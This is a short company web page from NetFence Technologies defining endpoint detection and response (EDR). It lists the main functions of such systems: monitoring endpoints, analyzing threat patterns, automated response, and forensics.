Endpoint Threat Detection and Response

EDR: Real-Time Threat Detection and Automated Response for Endpoint Security

Endpoint detection and response (EDR), also known as endpoint threat detection and response (ETDR), is an integrated endpoint security solution that combines real-time continuous monitoring and collection of endpoint data with rules-based automated response and analysis capabilities. The term was suggested by Anton Chuvakin at Gartner to describe emerging security systems that detect and investigate suspicious activities on hosts and endpoints, employing a high degree of automation to enable security teams to quickly identify and respond to threats.

The primary functions of an EDR security system are to:

Monitor and collect activity data from endpoints that could indicate a threat
Analyze this data to identify threat patterns
Automatically respond to identified threats to remove or contain them, and notify security personnel
Forensics and analysis tools to research identified threats and search for suspicious activities

Endpoint Threat Detection and Response

EDR: Real-Time Threat Detection and Automated Response for Endpoint Security

Contact us

Quick links

© Copyright 2024 | NetFence Technologies LLC | All rights reserved